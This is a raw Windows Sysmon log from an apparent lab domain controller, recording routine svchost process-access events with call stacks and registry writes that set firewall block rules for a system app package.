13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.649{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|M=microsoft.windows.secondarytileexperience_cw5n1h2txyewy|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|D=C:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\|PFN=Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy| 13241300x800000000000000011014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.633{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{874BE917-5739-43C8-9422-782DE9E26DDC}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x800000000000000011013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.633{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5A4FE045-114E-4084-8E15-055D0C7B5F65}v2.26|Action=Block|Active=TRUE|Dir=In|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 10341000x800000000000000011012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.602{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 